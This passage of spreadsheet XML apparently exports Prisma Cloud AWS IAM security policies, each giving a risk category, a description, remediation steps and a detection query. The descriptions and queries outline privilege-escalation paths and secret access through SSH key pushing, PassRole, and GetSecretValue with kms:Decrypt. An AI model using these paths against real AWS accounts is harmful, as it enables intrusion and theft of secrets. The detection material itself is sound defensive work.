      <c r="U3111" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3111" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3111" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow IAM users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111" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the IAM service
3. Click on Users
4. Choose the relevant user
5. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y311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1"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source.cloud.service.name = 'iam' and source.cloud.resource.type = 'user'</t>
        </is>
      </c>
      <c r="AA3111" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3111" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3111" t="inlineStr"/>
      <c r="AD3111" t="b">
        <v>1</v>
      </c>
      <c r="AE3111" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3111" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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1" t="inlineStr">
        <is>
          <t>e9a84ae4-1764-41f5-8565-5c848b3e0e67</t>
        </is>
      </c>
      <c r="AI3111" t="inlineStr">
        <is>
          <t>e9a84ae4-1764-41f5-8565-5c848b3e0e67</t>
        </is>
      </c>
      <c r="AJ3111" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3111" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3112">
      <c r="A3112" t="inlineStr"/>
      <c r="B3112" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3112" s="2" t="inlineStr"/>
      <c r="D3112" t="inlineStr"/>
      <c r="E3112" t="inlineStr"/>
      <c r="F3112" t="inlineStr"/>
      <c r="G3112" t="b">
        <v>1</v>
      </c>
      <c r="H31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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3112" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3112" t="inlineStr">
        <is>
          <t>AWS Elasticbeanstalk Platform with IAM wildcard resource access</t>
        </is>
      </c>
      <c r="L3112" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3112" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3112" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3112" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3112" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3112" t="inlineStr"/>
      <c r="R3112" t="inlineStr"/>
      <c r="S3112" t="inlineStr"/>
      <c r="T3112" t="b">
        <v>1</v>
      </c>
      <c r="U3112" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3112" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3112"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112" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS Elasticbeanstalk Platform service
3. Find the role used by the Elasticbeanstalk Platform instance
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and narrow down the wildcard permissions</t>
        </is>
      </c>
      <c r="Y311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2" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and dest.cloud.resource.name = '*' AND source.cloud.service.name = 'elasticbeanstalk' AND source.cloud.resource.type = 'platform'</t>
        </is>
      </c>
      <c r="AA3112" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3112" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3112" t="inlineStr"/>
      <c r="AD3112" t="b">
        <v>1</v>
      </c>
      <c r="AE3112" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3112" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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2" t="inlineStr">
        <is>
          <t>861ce295-6169-4da1-af30-66bd5880b81f</t>
        </is>
      </c>
      <c r="AI3112" t="inlineStr">
        <is>
          <t>861ce295-6169-4da1-af30-66bd5880b81f</t>
        </is>
      </c>
      <c r="AJ3112" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3112" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3113">
      <c r="A3113" t="inlineStr"/>
      <c r="B3113" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3113" s="2" t="inlineStr"/>
      <c r="D3113" t="n">
        <v>0</v>
      </c>
      <c r="E3113" t="n">
        <v>1</v>
      </c>
      <c r="F3113" t="n">
        <v>0</v>
      </c>
      <c r="G3113" t="b">
        <v>1</v>
      </c>
      <c r="H31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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3113" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3113" t="inlineStr">
        <is>
          <t>Third-party service account with a Lateral Movement Through Lambda Edit</t>
        </is>
      </c>
      <c r="L3113" t="inlineStr">
        <is>
          <t>CROSS_ACCOUNT_TRUST</t>
        </is>
      </c>
      <c r="M3113" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3113" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3113" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3113" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3113" t="inlineStr"/>
      <c r="R3113" t="inlineStr"/>
      <c r="S3113" t="inlineStr"/>
      <c r="T3113" t="b">
        <v>1</v>
      </c>
      <c r="U3113" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3113" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3113" t="inlineStr">
        <is>
          <t>This policy detects when third-party vendors are granted permissions to manage access to Lambda functions and pass IAM roles. Specifically, the 'lambda:AddPermission' action enables these accounts to grant execution permissions on Lambda functions to other AWS services, accounts, or organizations, potentially broadening access to sensitive functions. Additionally, the ability to 'iam:PassRole' can allow third-party accounts to assign roles that expand the permissions available to those entities.</t>
        </is>
      </c>
      <c r="X3113" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to AWS Console
 2. Navigate to the IAM pane, and search for the relevant role
 3. Remove the third-party account from the role's trust policy to revoke its access to the role.</t>
        </is>
      </c>
      <c r="Y311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3" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name CONTAINS ALL ('lambda:AddPermission', 'iam:PassRole') and grantedby.cloud.entity.type = 'role' AND source.cloud.account.isvendor = true</t>
        </is>
      </c>
      <c r="AA3113" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3113" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3113" t="inlineStr"/>
      <c r="AD3113" t="b">
        <v>1</v>
      </c>
      <c r="AE3113" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3113" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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3" t="inlineStr">
        <is>
          <t>e102d760-7f8d-437b-8688-ae9c6621b4ce</t>
        </is>
      </c>
      <c r="AI3113" t="inlineStr">
        <is>
          <t>e102d760-7f8d-437b-8688-ae9c6621b4ce</t>
        </is>
      </c>
      <c r="AJ3113" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3113" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3114">
      <c r="A3114" t="inlineStr"/>
      <c r="B3114" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3114" s="2" t="inlineStr"/>
      <c r="D3114" t="n">
        <v>0</v>
      </c>
      <c r="E3114" t="n">
        <v>4</v>
      </c>
      <c r="F3114" t="n">
        <v>0</v>
      </c>
      <c r="G3114" t="b">
        <v>1</v>
      </c>
      <c r="H31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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3114" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3114" t="inlineStr">
        <is>
          <t>AWS SQS Queue is Publicly Accessible Through Resource-Based Policies</t>
        </is>
      </c>
      <c r="L3114" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3114" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3114" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3114" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3114" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3114" t="inlineStr"/>
      <c r="R3114" t="inlineStr"/>
      <c r="S3114" t="inlineStr"/>
      <c r="T3114" t="b">
        <v>0</v>
      </c>
      <c r="U3114" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3114" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3114" t="inlineStr">
        <is>
          <t>This policy identifies AWS SQS Queues with Resource-based policies which allow all principals. This configuration creates a risk of sensitive information exposure.</t>
        </is>
      </c>
      <c r="X3114" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS SQS Queue service
3. Find resource-based policy of the AWS SQS Queue resource
4. Update the 'Principal' section of the policy to avoid public access</t>
        </is>
      </c>
      <c r="Y3114" t="inlineStr"/>
      <c r="Z3114" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND dest.cloud.service.name = 'sqs' AND dest.cloud.resource.type = 'queue' AND grantedby.cloud.policy.condition does not exist</t>
        </is>
      </c>
      <c r="AA3114" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3114" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3114" t="inlineStr"/>
      <c r="AD3114" t="b">
        <v>1</v>
      </c>
      <c r="AE3114" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3114" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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4" t="inlineStr">
        <is>
          <t>a47221da-a648-4690-906a-16b4ede82bbe</t>
        </is>
      </c>
      <c r="AI3114" t="inlineStr">
        <is>
          <t>a47221da-a648-4690-906a-16b4ede82bbe</t>
        </is>
      </c>
      <c r="AJ3114" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3114" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3115">
      <c r="A3115" t="inlineStr"/>
      <c r="B3115" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3115" s="2" t="inlineStr"/>
      <c r="D3115" t="n">
        <v>0</v>
      </c>
      <c r="E3115" t="n">
        <v>167</v>
      </c>
      <c r="F3115" t="n">
        <v>0</v>
      </c>
      <c r="G3115" t="b">
        <v>1</v>
      </c>
      <c r="H31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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3115" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3115" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via EC2 Instance Connect permissions</t>
        </is>
      </c>
      <c r="L3115" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3115" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3115" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3115" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3115" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3115" t="inlineStr"/>
      <c r="R3115" t="inlineStr"/>
      <c r="S3115" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3115" t="b">
        <v>1</v>
      </c>
      <c r="U3115" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3115" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3115" t="inlineStr">
        <is>
          <t>With access to ec2:DescribeInstances, ec2-instance-connect:SendSSHPublicKey, ec2-instance-connect:SendSerialConsoleSSHPublicKey permissions and the instance has a public IP with instance connect enabled, an adversary can have network access to push ssh keys and ssh to the instance. This could allow an adversary to escalate privileges through the EC2 instance.</t>
        </is>
      </c>
      <c r="X3115" t="inlineStr">
        <is>
          <t>"Do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1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5" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'ec2:DescribeInstances', 'ec2-instance-connect:SendSSHPublicKey', 'ec2-instance-connect:SendSerialConsoleSSHPublicKey' ) AND dest.cloud.wildcardscope = true</t>
        </is>
      </c>
      <c r="AA3115" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3115" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:36</t>
        </is>
      </c>
      <c r="AC3115" t="inlineStr"/>
      <c r="AD3115" t="b">
        <v>1</v>
      </c>
      <c r="AE3115" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3115" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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5" t="inlineStr">
        <is>
          <t>a6497b9e-4ee6-439a-8cba-86b0360bbe2f</t>
        </is>
      </c>
      <c r="AI3115" t="inlineStr">
        <is>
          <t>a6497b9e-4ee6-439a-8cba-86b0360bbe2f</t>
        </is>
      </c>
      <c r="AJ3115" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3115" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3116">
      <c r="A3116" t="inlineStr"/>
      <c r="B3116" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3116" s="2" t="inlineStr"/>
      <c r="D3116" t="inlineStr"/>
      <c r="E3116" t="inlineStr"/>
      <c r="F3116" t="inlineStr"/>
      <c r="G3116" t="b">
        <v>1</v>
      </c>
      <c r="H31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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3116" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3116" t="inlineStr">
        <is>
          <t>AWS Role With Administrative Permissions Can Be Assumed By All Users</t>
        </is>
      </c>
      <c r="L3116" t="inlineStr">
        <is>
          <t>LATERAL_MOVEMENT</t>
        </is>
      </c>
      <c r="M3116" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N3116" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3116" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3116" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3116" t="inlineStr"/>
      <c r="R3116" t="inlineStr"/>
      <c r="S3116" t="inlineStr"/>
      <c r="T3116" t="b">
        <v>1</v>
      </c>
      <c r="U3116" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3116" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3116" t="inlineStr">
        <is>
          <t>A globally assumable role with administartive permissions could allow an adversary to assume it (regardless of their original role as the target role is globally assumable) and utilize its administrative permissions to further compromise the environment.</t>
        </is>
      </c>
      <c r="X3116" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, take note of the "Asset Name". Then select the "Alert ID", then "Investigate"
2. In the results, you will see the policy granting the administrative permissions to the role ("Granted By Policy"), and the specific administrative permissions ("Destination")
3. Sign in to the AWS Console
4. Navigate to the affected role
5. Examine the role's trust relationship and permissions as well as its use case
In order to remove any administrative permissions and minimize trusted entities which can assume the role, use the following remediation steps:
Browse to the role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managed policy could affect other roles).</t>
        </is>
      </c>
      <c r="Y311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6" t="inlineStr">
        <is>
          <t>config from iam where source.public = true AND grantedby.cloud.entity.type='role' and action.access.isAdministrative = true</t>
        </is>
      </c>
      <c r="AA3116" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3116" t="inlineStr">
        <is>
          <t>2024-10-30 17:07:42</t>
        </is>
      </c>
      <c r="AC3116" t="inlineStr"/>
      <c r="AD3116" t="b">
        <v>1</v>
      </c>
      <c r="AE3116" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3116" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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6" t="inlineStr">
        <is>
          <t>04a8b74e-e5e3-4534-bc6b-b1bbf26fcc93</t>
        </is>
      </c>
      <c r="AI3116" t="inlineStr">
        <is>
          <t>04a8b74e-e5e3-4534-bc6b-b1bbf26fcc93</t>
        </is>
      </c>
      <c r="AJ3116" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3116" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3117">
      <c r="A3117" t="inlineStr"/>
      <c r="B3117" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3117" s="2" t="inlineStr"/>
      <c r="D3117" t="n">
        <v>268</v>
      </c>
      <c r="E3117" t="n">
        <v>4</v>
      </c>
      <c r="F3117" t="n">
        <v>0</v>
      </c>
      <c r="G3117" t="b">
        <v>1</v>
      </c>
      <c r="H31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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3117" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3117" t="inlineStr">
        <is>
          <t>AWS IAM policy allows access and decrypt Secrets Manager Secrets permissions</t>
        </is>
      </c>
      <c r="L3117" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3117" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3117" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3117" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3117" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3117" t="inlineStr"/>
      <c r="R3117" t="inlineStr"/>
      <c r="S3117" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3117" t="b">
        <v>1</v>
      </c>
      <c r="U3117" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3117" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3117" t="inlineStr">
        <is>
          <t>This IAM policy tackles potential vulnerabilities linked to an AWS EC2 instance equipped with an IAM role that confers access to the 'secretsmanager:GetSecretValue' and 'kms:Decrypt' actions. By closely managing permissions within the 'ec2' service, this policy guards against unauthorized retrieval of sensitive secrets from Secrets Manager and unauthorized decryption of encrypted data through AWS Key Management Service (KMS). This strategic control ensures the safeguarding of system confidentiality and integrity, mitigating risks associated with potential unauthorized access or compromise.</t>
        </is>
      </c>
      <c r="X3117"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1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7" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' AND action.name IN ( 'secretsmanager:GetSecretValue', 'kms:Decrypt' ) AND source.cloud.service.name = 'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3117" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3117" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3117" t="inlineStr"/>
      <c r="AD3117" t="b">
        <v>1</v>
      </c>
      <c r="AE3117" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3117" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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7" t="inlineStr">
        <is>
          <t>3c818c49-0763-415d-8053-454a0032fee4</t>
        </is>
      </c>
      <c r="AI3117" t="inlineStr">
        <is>
          <t>3c818c49-0763-415d-8053-454a0032fee4</t>
        </is>
      </c>
      <c r="AJ3117" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3117" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3118">
      <c r="A3118" t="inlineStr"/>
      <c r="B3118" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3118" s="2" t="inlineStr"/>
      <c r="D3118" t="n">
        <v>0</v>
      </c>
      <c r="E3118" t="n">
        <v>843</v>
      </c>
      <c r="F3118" t="n">
        <v>0</v>
      </c>
      <c r="G3118" t="b">
        <v>1</v>
      </c>
      <c r="H31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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3118" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3118" t="inlineStr">
        <is>
          <t>AWS effective permissions granting wildcard resource access</t>
        </is>
      </c>
      <c r="L3118" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3118" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3118" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3118" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3118" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3118" t="inlineStr"/>
      <c r="R3118" t="inlineStr"/>
      <c r="S3118" t="inlineStr"/>
      <c r="T3118" t="b">
        <v>1</v>
      </c>
      <c r="U3118" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3118" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3118"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118" t="inlineStr">
        <is>
          <t>Remediation for a user:
1. Log in to the AWS console
2. Navigate to the IAM service
3. Click on Users
4. Choose the relevant user
5. Under 'Permissions policies', find the relevant policy according to the alert details and narrow down the wildcard permissions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narrow down the wildcard permissions
----------------------------------------
Remediation for a Resource-based Policy:
1. Log in to the AWS console
2. Navigate to the relevant service (For example, AWS S3)
3. Find resource-based policy of the resource
4. Narrow down the wildcard permission according to the alert details</t>
        </is>
      </c>
      <c r="Y311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8" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and dest.cloud.resource.name = '*'</t>
        </is>
      </c>
      <c r="AA3118" t="inlineStr">
        <is>
          <t>Prakash Kumar</t>
        </is>
      </c>
      <c r="AB3118" t="inlineStr">
        <is>
          <t>2023-03-10 09:59:16</t>
        </is>
      </c>
      <c r="AC3118" t="inlineStr"/>
      <c r="AD3118" t="b">
        <v>1</v>
      </c>
      <c r="AE3118" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3118" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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8" t="inlineStr">
        <is>
          <t>a507cd69-fe30-403c-8c45-132fdf20822c</t>
        </is>
      </c>
      <c r="AI3118" t="inlineStr">
        <is>
          <t>a507cd69-fe30-403c-8c45-132fdf20822c</t>
        </is>
      </c>
      <c r="AJ3118" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3118" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3119">
      <c r="A3119" t="inlineStr"/>
      <c r="B3119" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3119" s="2" t="inlineStr"/>
      <c r="D3119" t="n">
        <v>0</v>
      </c>
      <c r="E3119" t="n">
        <v>0</v>
      </c>
      <c r="F3119" t="n">
        <v>327</v>
      </c>
      <c r="G3119" t="b">
        <v>1</v>
      </c>
      <c r="H31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fricieri-teste-ciem-rule,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19" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3119" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3119" t="inlineStr">
        <is>
          <t>AWS Users and Machine Identities with Administrative Permissions</t>
        </is>
      </c>
      <c r="L3119" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3119" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3119" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3119" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3119" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3119" t="inlineStr"/>
      <c r="R3119" t="inlineStr"/>
      <c r="S3119" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3119" t="b">
        <v>1</v>
      </c>
      <c r="U3119" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3119" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3119" t="inlineStr">
        <is>
          <t>This policy identifies AWS Users and Machine Identities with Administrative Permissions.
Risk of Administrative Permissions:
IAM users and machine identities with active administrative privileges (elevated permissions) pose a significant security risk because:
Unsecured "Root Keys": These accounts act like misplaced root keys. If compromised, attackers can exploit them to gain complete control over your AWS environment. They can create, modify, or delete any resource, potentially leading to severe disruption, data breaches, or financial losses.
Escalation of Privilege: Administrative permissions often grant the ability to elevate privileges of other accounts, potentially granting attackers access to even more sensitive resources and systems.
Mitigating the Risk:
Principle of Least Privilege: Always adhere to the principle of least privilege when assigning IAM permissions. Avoid creating users or machine identities with administrative privileges unless absolutely necessary.
MFA for Administrative Users: Enforce Multi-Factor Authentication (MFA) for all IAM users with administrative privileges. MFA adds an extra layer of security and makes it significantly harder for attackers to compromise an account, even if they obtain the credentials.
Use Temporary Credentials: Consider using temporary credentials with limited lifespans and permissions for tasks requiring administrative access. This approach minimizes the window of opportunity for attackers if they compromise a credential.
Assume Role for Restricted Access: Utilize the "Assume Role" functionality to grant temporary administrative access to specific resources for users with lower privileges. This approach minimizes the need for permanent administrative accounts.
Regular Review and Auditing: Regularly review IAM user and machine identity permissions, especially those with administrative privileges. Conduct periodic security audits to identify potential weaknesses in your IAM configuration.
Monitor for Suspicious Activity: Utilize CloudTrail to track API calls made within your AWS environment, including those leveraging privileged users or machine identities. This vigilance can help detect unusual activity related to these accounts that might indicate a compromise.</t>
        </is>
      </c>
      <c r="X3119"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11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19" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' and action.access.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3119" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3119" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3119" t="inlineStr"/>
      <c r="AD3119" t="b">
        <v>1</v>
      </c>
      <c r="AE3119" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3119" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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19" t="inlineStr">
        <is>
          <t>264eb81b-a98d-44f5-9067-0eee731bb892</t>
        </is>
      </c>
      <c r="AI3119" t="inlineStr">
        <is>
          <t>264eb81b-a98d-44f5-9067-0eee731bb892</t>
        </is>
      </c>
      <c r="AJ3119" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3119" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3120">
      <c r="A3120" t="inlineStr"/>
      <c r="B3120" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3120" s="2" t="inlineStr"/>
      <c r="D3120" t="n">
        <v>0</v>
      </c>
      <c r="E3120" t="n">
        <v>121</v>
      </c>
      <c r="F3120" t="n">
        <v>0</v>
      </c>
      <c r="G3120" t="b">
        <v>1</v>
      </c>
      <c r="H31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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3120" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3120" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; Glue create job permissions</t>
        </is>
      </c>
      <c r="L3120" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3120" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3120" t="inlineStr">
        <is>
